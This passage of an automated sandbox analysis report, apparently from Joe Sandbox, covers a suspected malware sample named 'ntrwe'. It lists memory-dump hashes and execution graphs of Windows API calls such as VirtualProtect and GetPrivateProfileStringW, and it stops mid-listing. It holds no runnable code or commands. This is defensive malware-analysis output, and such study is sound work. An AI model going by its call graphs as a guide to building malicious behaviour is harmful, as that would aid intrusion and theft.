                                                                                          • Instruction ID: df84af2f3beeeeb9e5e89676fe4c1aef11dc7000f3772231e6974926f5d978c9
                                                                                          • Opcode Fuzzy Hash: b78654d4964c837db203ed80329933d8988c26285472aed6571cfd7b3c76df87
                                                                                          • Instruction Fuzzy Hash: 1131C8B4D052189FCB10CFA9E884ADEFBB4BF49314F14942AE815B7300CB79A905CFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2188703471.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_2ed000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a34e4ca73961f9ec52543809fba87ed2b08ae967d2c02e8750281194d09f3765
                                                                                          • Instruction ID: 63af54c0c16f786440fd483dd467809e84bf4d713028b7ac5efc29de41a56af8
                                                                                          • Opcode Fuzzy Hash: a34e4ca73961f9ec52543809fba87ed2b08ae967d2c02e8750281194d09f3765
                                                                                          • Instruction Fuzzy Hash: 40216771594284DFCB11DF11D8C0B2ABF61FBD8318FA4C569E8050B246C376D826CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2188703471.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_2ed000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9ebe2f0c497ad53ec6951bd8cf6f14a1f57e1ce7d1a34490d043ef8fb6ca204b
                                                                                          • Instruction ID: 1f2aad7d7927975cc0f5b9e64cf172cacfb81b797665835c11ba762a6c1d7739
                                                                                          • Opcode Fuzzy Hash: 9ebe2f0c497ad53ec6951bd8cf6f14a1f57e1ce7d1a34490d043ef8fb6ca204b
                                                                                          • Instruction Fuzzy Hash: 7A217C75154284DFCF11DF11D9C0B16BF65FBA8314F64C168E9094B28AC376E826CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2188703471.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_2ed000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction ID: 63fca7ee3b93e9a2b98ab7153e122a458aa8f09166180add0e9036f4f008bc25
                                                                                          • Opcode Fuzzy Hash: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction Fuzzy Hash: A711E676444280CFCF12CF10D9C4B16BF71FB94314F24C6A9D8450B616C336D86ACBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2188703471.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_2ed000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction ID: 14b82c86e0a261bacfab772cf7acaf1247fb0dd1d871446c9bf6b0a6163b3bc3
                                                                                          • Opcode Fuzzy Hash: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction Fuzzy Hash: 0311E676444281DFCF12CF10D5C4B16BF71FBA4324F24C6A9D8090B656C33AE866CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2188703471.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_2ed000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f37a8812f14dfdfc0f0fa185572e1365ccb143e9d6a7610b4404704f376a0f82
                                                                                          • Instruction ID: 2d568d7d083ccdf4a38187dbf25ea2b0cef9381cd2051a8951531c2405910c73
                                                                                          • Opcode Fuzzy Hash: f37a8812f14dfdfc0f0fa185572e1365ccb143e9d6a7610b4404704f376a0f82
                                                                                          • Instruction Fuzzy Hash: B101A73145C3849AE7109F27CC88B67FFD8EF46724F58C45AEE055A286C7B99C40C6B1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.2188703471.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_2ed000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b8493d236bb89a91fa64ece0e7e199b66822e7bf06802ee5e4be01cad97261a
                                                                                          • Instruction ID: c911416c86bc21e2417b0baa52bf9065a1b11bef49de1be7fe87c7cf486cd0da
                                                                                          • Opcode Fuzzy Hash: 0b8493d236bb89a91fa64ece0e7e199b66822e7bf06802ee5e4be01cad97261a
                                                                                          • Instruction Fuzzy Hash: D2F06275448284AAE7108F16CC88B63FFD8EF52734F58C55AED095B286C3789C44CBB1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Execution Graph

                                                                                          Execution Coverage:28.6%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:6
                                                                                          Total number of Limit Nodes:0

                                                                                          Graph

                                                                                          execution_graph 3458 493ac8 3459 493b15 VirtualProtect 3458->3459 3460 493b81 3459->3460 3464 493ac1 3465 493ac8 VirtualProtect 3464->3465 3467 493b81 3465->3467

                                                                                          Executed Functions

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 514 493ac1-493b7f VirtualProtect 517 493b88-493bc4 514->517 518 493b81-493b87 514->518 518->517
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00493B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000010.00000002.2180712272.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_16_2_490000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 7cfc1dec15c0a320f7a0a81a9ae4377c98e868250a80e154f86efb6e0876ea53
                                                                                          • Instruction ID: 443943854f6d6a98ebc2b00daa6d014067d97b282c2f81bafc76875b87e3ca15
                                                                                          • Opcode Fuzzy Hash: 7cfc1dec15c0a320f7a0a81a9ae4377c98e868250a80e154f86efb6e0876ea53
                                                                                          • Instruction Fuzzy Hash: AF318BB9D042589FCF10CFA9D484ADEFBB0FB5A310F14916AE814B7210D779AA45CFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 521 4977b8-497877 VirtualProtect 523 497879-49787f 521->523 524 497880-4978bc 521->524 523->524
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00497867
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000010.00000002.2180712272.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_16_2_490000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: a8268349850fff31f9ec37e64b250eb77d3242606b2f3876cff23b8586076952
                                                                                          • Instruction ID: 2acc39a6425e7ef4ff805ea7d698ef9638e4c0dd8b04d110b8ed2c89d85a037a
                                                                                          • Opcode Fuzzy Hash: a8268349850fff31f9ec37e64b250eb77d3242606b2f3876cff23b8586076952
                                                                                          • Instruction Fuzzy Hash: F6318BB8D042589FCF10CFA9D484ADEFBB0FB4A310F14942AE814B7210D379A945CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 527 493ac8-493b7f VirtualProtect 529 493b88-493bc4 527->529 530 493b81-493b87 527->530 530->529
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00493B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000010.00000002.2180712272.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_16_2_490000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 5b59cbeec029ccfda7bed4b27bab7053d8ad72898d590d104d00fe62d030d7a5
                                                                                          • Instruction ID: d638db8baff1002c1be4f70516dfb5bdee4ff048705086dbf0d396a49cff133f
                                                                                          • Opcode Fuzzy Hash: 5b59cbeec029ccfda7bed4b27bab7053d8ad72898d590d104d00fe62d030d7a5
                                                                                          • Instruction Fuzzy Hash: 5D3178B9D042589FCF10CFA9D484ADEFBB0BB5A310F24902AE815B7210D779AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 533 4977c0-497877 VirtualProtect 535 497879-49787f 533->535 536 497880-4978bc 533->536 535->536
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00497867
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000010.00000002.2180712272.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_16_2_490000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 853396abb13c093abd0e45b84978c43c9a91ad57b48246c64b16e4cbeea465f0
                                                                                          • Instruction ID: f3ca778b650f3feea0f0f6c0e90890ace242cc0edba2d969e8c4bd8fcfec3d19
                                                                                          • Opcode Fuzzy Hash: 853396abb13c093abd0e45b84978c43c9a91ad57b48246c64b16e4cbeea465f0
                                                                                          • Instruction Fuzzy Hash: CD317AB9D042589FCF10CFA9D484ADEFBB0BB49310F14942AE814B7210D779A945CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000010.00000002.2180386606.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_16_2_26d000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 93a950590cb4dcc085620100c1e1004d40ddaefe4e8578e77e207a8c02ffcd1a
                                                                                          • Instruction ID: e1c7ed25962f63197a79aae58b93d4916a30d5638a9064d78aa59f33a0d9f152
                                                                                          • Opcode Fuzzy Hash: 93a950590cb4dcc085620100c1e1004d40ddaefe4e8578e77e207a8c02ffcd1a
                                                                                          • Instruction Fuzzy Hash: 93213771A14248DFCB15DF10D8C0B26BF65FBC8318F34C569E9064B646C376D8A6CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000010.00000002.2180386606.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_16_2_26d000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1aa3765027647a77c0d6e8796bea0eab48ef7cee7c7a6b1a4010243fde40c42f
                                                                                          • Instruction ID: 39738165240aded72b84672b39996a15016c003e343ee4ed73492103c800d139
                                                                                          • Opcode Fuzzy Hash: 1aa3765027647a77c0d6e8796bea0eab48ef7cee7c7a6b1a4010243fde40c42f
                                                                                          • Instruction Fuzzy Hash: DD214875A14248DFCB10DF10D9C0B16BF65FB98314F24C168E9094B20AC776ECA6CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000010.00000002.2180386606.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_16_2_26d000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction ID: 7a436ce6e5202513f0be71fbe4149d8f6527afc652e5e214e5d8637464dcedf8
                                                                                          • Opcode Fuzzy Hash: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction Fuzzy Hash: D311D376904284DFCB12CF10D5C4B16BF71FB94324F28C6A9D8094B656C33AE866CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000010.00000002.2180386606.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_16_2_26d000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction ID: c1f02e06854c39a0b57a8822fcc085a1667be30b405db7da440fc0b2b70c635c
                                                                                          • Opcode Fuzzy Hash: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction Fuzzy Hash: A911E676904284CFCF12CF10D5C4B16BF71FB94314F28C6A9D8450B616C336D86ACBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Execution Graph

                                                                                          Execution Coverage:30.5%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:4.5%
                                                                                          Total number of Nodes:1842
                                                                                          Total number of Limit Nodes:98

                                                                                          Graph

                                                                                          execution_graph 9740 40c640 9767 404bee 9740->9767 9743 40c70f 9744 404bee 5 API calls 9745 40c66b 9744->9745 9746 40c708 9745->9746 9748 404bee 5 API calls 9745->9748 9747 402bab 2 API calls 9746->9747 9747->9743 9749 40c683 9748->9749 9750 40c701 9749->9750 9752 404bee 5 API calls 9749->9752 9751 402bab 2 API calls 9750->9751 9751->9746 9755 40c694 9752->9755 9753 40c6f8 9754 402bab 2 API calls 9753->9754 9754->9750 9755->9753 9774 40c522 9755->9774 9757 40c6a9 9758 405872 4 API calls 9757->9758 9766 40c6ef 9757->9766 9760 40c6c5 9758->9760 9759 402bab 2 API calls 9759->9753 9761 405872 4 API calls 9760->9761 9762 40c6d5 9761->9762 9763 405872 4 API calls 9762->9763 9764 40c6e7 9763->9764 9765 402bab 2 API calls 9764->9765 9765->9766 9766->9759 9768 402b7c 2 API calls 9767->9768 9770 404bff 9768->9770 9769 404c3b 9769->9743 9769->9744 9770->9769 9771 4031e5 3 API calls 9770->9771 9772 404c28 9771->9772 9772->9769 9773 402bab 2 API calls 9772->9773 9773->9769 9775 402b7c 2 API calls 9774->9775 9776 40c542 9775->9776 9776->9757 8430 409046 8443 413b28 8430->8443 8432 40906d 8434 405b6f 5 API calls 8432->8434 8433 40904e 8433->8432 8435 403fbf 6 API calls 8433->8435 8436 40907c 8434->8436 8435->8432 8437 409092 8436->8437 8447 409408 8436->8447 8439 4090a3 8437->8439 8442 402bab 2 API calls 8437->8442 8441 402bab 2 API calls 8441->8437 8442->8439 8444 413b31 8443->8444 8445 413b38 8443->8445 8446 404056 6 API calls 8444->8446 8445->8433 8446->8445 8448 409413 8447->8448 8449 40908c 8448->8449 8461 409d36 8448->8461 8449->8441 8460 40945c 8567 40a35d 8460->8567 8462 409d43 8461->8462 8463 40a35d 4 API calls 8462->8463 8464 409d55 8463->8464 8465 4031e5 3 API calls 8464->8465 8466 409d8b 8465->8466 8467 4031e5 3 API calls 8466->8467 8468 409dd0 8467->8468 8469 405b6f 5 API calls 8468->8469 8470 409423 8468->8470 8473 409df7 8469->8473 8470->8460 8523 4056bf 8470->8523 8471 409e1c 8471->8470 8472 4031e5 3 API calls 8471->8472 8474 409e62 8472->8474 8473->8471 8475 402bab 2 API calls 8473->8475 8476 4031e5 3 API calls 8474->8476 8475->8471 8477 409e82 8476->8477 8478 4031e5 3 API calls 8477->8478 8479 409ea2 8478->8479 8480 4031e5 3 API calls 8479->8480 8481 409ec2 8480->8481 8482 4031e5 3 API calls 8481->8482 8483 409ee2 8482->8483 8484 4031e5 3 API calls 8483->8484 8485 409f02 8484->8485 8486 4031e5 3 API calls 8485->8486 8487 409f22 8486->8487 8488 4031e5 3 API calls 8487->8488 8491 409f42 8488->8491 8489 40a19b 8490 408b2c 4 API calls 8489->8490 8490->8470 8491->8489 8492 409fa3 8491->8492 8492->8470 8493 405b6f 5 API calls 8492->8493 8495 409fbd 8493->8495 8494 40a02c 8497 4031e5 3 API calls 8494->8497 8522 40a16d 8494->8522 8495->8494 8496 402bab 2 API calls 8495->8496 8498 409fd7 8496->8498 8499 40a070 8497->8499 8501 405b6f 5 API calls 8498->8501 8502 4031e5 3 API calls 8499->8502 8500 402bab 2 API calls 8500->8470 8504 409fe5 8501->8504 8503 40a090 8502->8503 8506 4031e5 3 API calls 8503->8506 8504->8494 8505 402bab 2 API calls 8504->8505 8507 409fff 8505->8507 8508 40a0b0 8506->8508 8509 405b6f 5 API calls 8507->8509 8511 4031e5 3 API calls 8508->8511 8510 40a00d 8509->8510 8510->8494 8513 40a021 8510->8513 8512 40a0d0 8511->8512 8515 4031e5 3 API calls 8512->8515 8514 402bab 2 API calls 8513->8514 8514->8470 8516 40a0f0 8515->8516 8517 4031e5 3 API calls 8516->8517 8518 40a110 8517->8518 8519 40a134 8518->8519 8520 4031e5 3 API calls 8518->8520 8519->8522 8577 408b2c 8519->8577 8520->8519 8522->8470 8522->8500 8524 402b7c 2 API calls 8523->8524 8526 4056cd 8524->8526 8525 4056d4 8528 408c4d 8525->8528 8526->8525 8527 402b7c 2 API calls 8526->8527 8527->8525 8529 413ba4 6 API calls 8528->8529 8530 408c5c 8529->8530 8531 408f02 8530->8531 8532 408f3a 8530->8532 8535 40903e 8530->8535 8533 405b6f 5 API calls 8531->8533 8534 405b6f 5 API calls 8532->8534 8536 408f0c 8533->8536 8549 408f51 8534->8549 8551 413aca 8535->8551 8536->8535 8537 40a1b6 14 API calls 8536->8537 8539 408f31 8536->8539 8537->8539 8538 402bab 2 API calls 8538->8535 8539->8538 8540 405b6f GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree GetPEB 8540->8549 8542 409031 8543 402bab 2 API calls 8542->8543 8543->8539 8544 409022 8545 402bab 2 API calls 8544->8545 8546 409028 8545->8546 8547 402bab 2 API calls 8546->8547 8547->8539 8548 402bab GetProcessHeap HeapFree 8548->8549 8549->8535 8549->8539 8549->8540 8549->8542 8549->8544 8549->8548 8580 4044ee 8549->8580 8590 40a1b6 8549->8590 8552 413ad7 8551->8552 8560 409451 8551->8560 8553 405781 4 API calls 8552->8553 8554 413af0 8553->8554 8555 405781 4 API calls 8554->8555 8556 413afe 8555->8556 8557 405762 4 API calls 8556->8557 8558 413b0e 8557->8558 8559 405781 4 API calls 8558->8559 8558->8560 8559->8560 8561 405695 8560->8561 8562 4056a0 8561->8562 8563 4056b9 8561->8563 8564 402bab 2 API calls 8562->8564 8563->8460 8565 4056b3 8564->8565 8566 402bab 2 API calls 8565->8566 8566->8563 8568 40a368 8567->8568 8569 40a39a 8567->8569 8575 4031e5 3 API calls 8568->8575 8570 40a3af 8569->8570 8571 4031e5 3 API calls 8569->8571 8572 40a3ca 8570->8572 8573 408b2c 4 API calls 8570->8573 8571->8570 8574 40a38a 8572->8574 8576 408b2c 4 API calls 8572->8576 8573->8572 8574->8449 8575->8574 8576->8574 8578 4031e5 3 API calls 8577->8578 8579 408b3e FreeLibrary 8578->8579 8579->8522 8581 402b7c 2 API calls 8580->8581 8588 404512 8581->8588 8582 40457c 8582->8549 8584 404585 GetLastError 8584->8582 8585 404592 8584->8585 8587 402bab 2 API calls 8585->8587 8586 402bab 2 API calls 8586->8588 8587->8582 8588->8582 8588->8584 8588->8586 8589 402b7c 2 API calls 8588->8589 8624 4044a7 8588->8624 8589->8588 8591 40a202 8590->8591 8592 40a1c3 8590->8592 8627 405f08 8591->8627 8594 405b6f 5 API calls 8592->8594 8596 40a1d0 8594->8596 8595 40a1fc 8595->8549 8596->8595 8597 40a1f3 8596->8597 8634 40a45b 8596->8634 8602 402bab 2 API calls 8597->8602 8599 40a333 8601 402bab 2 API calls 8599->8601 8601->8595 8602->8595 8603 405b6f 5 API calls 8605 40a245 8603->8605 8604 40a25d 8606 405b6f 5 API calls 8604->8606 8605->8604 8607 413a58 13 API calls 8605->8607 8612 40a26b 8606->8612 8608 40a257 8607->8608 8611 402bab 2 API calls 8608->8611 8609 40a28b 8610 405b6f 5 API calls 8609->8610 8617 40a297 8610->8617 8611->8604 8612->8609 8613 40a284 8612->8613 8746 40955b 8612->8746 8615 402bab 2 API calls 8613->8615 8615->8609 8616 405b6f 5 API calls 8621 40a2b7 8616->8621 8618 40a2b0 8617->8618 8617->8621 8753 40968e 8617->8753 8619 402bab 2 API calls 8618->8619 8619->8621 8621->8599 8621->8616 8623 402bab 2 API calls 8621->8623 8763 4098a7 8621->8763 8623->8621 8625 4031e5 3 API calls 8624->8625 8626 4044b9 GetPrivateProfileStringW 8625->8626 8626->8588 8628 4031e5 3 API calls 8627->8628 8629 405f1d 8628->8629 8630 402b7c 2 API calls 8629->8630 8631 405f55 8629->8631 8632 405f36 8630->8632 8631->8595 8631->8599 8631->8603 8631->8604 8632->8631 8633 4031e5 3 API calls 8632->8633 8633->8631 8772 40642c 8634->8772 8636 40a469 8637 40c4ff 8636->8637 8775 4047e6 8636->8775 8637->8597 8640 4040bb 12 API calls 8641 40bf88 8640->8641 8641->8637 8642 403c90 8 API calls 8641->8642 8643 40bfaa 8642->8643 8644 402b7c 2 API calls 8643->8644 8646 40bfc1 8644->8646 8645 40c4f3 8647 403f9e 4 API calls 8645->8647 8648 40c3aa 8646->8648 8782 40a423 8646->8782 8647->8637 8648->8645 8651 4056bf 2 API calls 8648->8651 8654 40c4e3 8648->8654 8649 402bab 2 API calls 8649->8645 8653 40c3d2 8651->8653 8653->8654 8656 4040bb 12 API calls 8653->8656 8654->8649 8655 405f08 3 API calls 8657 40c005 8655->8657 8658 40c3f3 8656->8658 8659 40c021 8657->8659 8785 40a43f 8657->8785 8661 40c4d1 8658->8661 8842 405a52 8658->8842 8660 4031e5 3 API calls 8659->8660 8663 40c034 8660->8663 8666 413aca 4 API calls 8661->8666 8672 4031e5 3 API calls 8663->8672 8667 40c4dd 8666->8667 8670 405695 2 API calls 8667->8670 8668 40c411 8847 405a87 8668->8847 8669 402bab 2 API calls 8669->8659 8670->8654 8678 40c04d 8672->8678 8673 40c4b3 8674 402bab 2 API calls 8673->8674 8676 40c4cb 8674->8676 8675 405a52 3 API calls 8686 40c423 8675->8686 8677 403f9e 4 API calls 8676->8677 8677->8661 8680 4031e5 3 API calls 8678->8680 8679 405a87 3 API calls 8679->8686 8682 40c085 8680->8682 8681 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8681->8686 8683 4031e5 3 API calls 8682->8683 8684 40c09c 8683->8684 8687 4031e5 3 API calls 8684->8687 8685 402bab 2 API calls 8685->8686 8686->8673 8686->8675 8686->8679 8686->8681 8686->8685 8688 40c0b3 8687->8688 8689 4031e5 3 API calls 8688->8689 8690 40c0ca 8689->8690 8691 4031e5 3 API calls 8690->8691 8692 40c0e7 8691->8692 8693 4031e5 3 API calls 8692->8693 8694 40c100 8693->8694 8695 4031e5 3 API calls 8694->8695 8696 40c119 8695->8696 8697 4031e5 3 API calls 8696->8697 8698 40c132 8697->8698 8699 4031e5 3 API calls 8698->8699 8700 40c14b 8699->8700 8701 4031e5 3 API calls 8700->8701 8702 40c164 8701->8702 8703 4031e5 3 API calls 8702->8703 8704 40c17d 8703->8704 8705 4031e5 3 API calls 8704->8705 8706 40c196 8705->8706 8707 4031e5 3 API calls 8706->8707 8708 40c1af 8707->8708 8709 4031e5 3 API calls 8708->8709 8710 40c1c8 8709->8710 8711 4031e5 3 API calls 8710->8711 8712 40c1de 8711->8712 8713 4031e5 3 API calls 8712->8713 8714 40c1f4 8713->8714 8715 4031e5 3 API calls 8714->8715 8716 40c20d 8715->8716 8717 4031e5 3 API calls 8716->8717 8718 40c226 8717->8718 8719 4031e5 3 API calls 8718->8719 8720 40c23f 8719->8720 8721 4031e5 3 API calls 8720->8721 8722 40c258 8721->8722 8723 4031e5 3 API calls 8722->8723 8724 40c273 8723->8724 8725 4031e5 3 API calls 8724->8725 8726 40c28a 8725->8726 8727 4031e5 3 API calls 8726->8727 8730 40c2d5 8727->8730 8728 40c3a2 8729 402bab 2 API calls 8728->8729 8729->8648 8730->8728 8731 4031e5 3 API calls 8730->8731 8732 40c315 8731->8732 8733 40c38b 8732->8733 8788 404866 8732->8788 8734 403c40 4 API calls 8733->8734 8736 40c397 8734->8736 8738 403c40 4 API calls 8736->8738 8738->8728 8739 40c382 8741 403c40 4 API calls 8739->8741 8741->8733 8743 406c4c 5 API calls 8744 40c355 8743->8744 8744->8739 8812 4126a7 8744->8812 8750 40956d 8746->8750 8752 409673 8746->8752 8747 408b45 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree GetPEB 8747->8750 8748 4059d8 GetProcessHeap RtlAllocateHeap GetPEB 8748->8750 8749 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8749->8750 8750->8747 8750->8748 8750->8749 8751 402bab GetProcessHeap HeapFree 8750->8751 8750->8752 8751->8750 8752->8613 8754 4040bb 12 API calls 8753->8754 8761 4096a9 8754->8761 8755 40989f 8755->8618 8756 409896 8757 403f9e 4 API calls 8756->8757 8757->8755 8759 408b45 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree GetPEB 8759->8761 8760 402bab GetProcessHeap HeapFree 8760->8761 8761->8755 8761->8756 8761->8759 8761->8760 8762 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8761->8762 9011 4059d8 8761->9011 8762->8761 8764 4040bb 12 API calls 8763->8764 8770 4098c1 8764->8770 8765 4099fb 8765->8621 8766 4099f3 8767 403f9e 4 API calls 8766->8767 8767->8765 8768 4059d8 3 API calls 8768->8770 8769 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8769->8770 8770->8765 8770->8766 8770->8768 8770->8769 8771 402bab GetProcessHeap HeapFree 8770->8771 8771->8770 8773 4031e5 3 API calls 8772->8773 8774 406441 GetNativeSystemInfo 8773->8774 8774->8636 8776 4031e5 3 API calls 8775->8776 8778 40480a 8776->8778 8777 4031e5 3 API calls 8777->8778 8778->8777 8780 40485d 8778->8780 8781 40484f 8778->8781 8779 403c40 4 API calls 8779->8780 8780->8637 8780->8640 8781->8779 8783 4031e5 3 API calls 8782->8783 8784 40a435 8783->8784 8784->8655 8786 4031e5 3 API calls 8785->8786 8787 40a451 8786->8787 8787->8669 8789 4031e5 3 API calls 8788->8789 8790 40487c 8789->8790 8790->8739 8791 406c4c 8790->8791 8852 4068eb 8791->8852 8793 406e02 8793->8743 8794 406cab 8864 40469b 8794->8864 8795 406c6c 8795->8793 8795->8794 8861 406894 8795->8861 8802 406df1 8803 40469b 3 API calls 8802->8803 8803->8793 8804 406cef 8804->8802 8805 4031e5 3 API calls 8804->8805 8806 406d26 8805->8806 8806->8802 8807 40771e 5 API calls 8806->8807 8811 406d57 8807->8811 8808 406da2 8809 4031e5 3 API calls 8808->8809 8809->8802 8811->8808 8877 4068b0 8811->8877 8813 4126bb 8812->8813 8814 4126d1 8812->8814 8815 412840 8813->8815 8933 40488c 8813->8933 8814->8815 8939 407055 8814->8939 8815->8739 8820 403c40 4 API calls 8820->8815 8821 4070ff 5 API calls 8823 412837 8821->8823 8823->8820 8824 407055 5 API calls 8825 412742 8824->8825 8826 41281e 8825->8826 8827 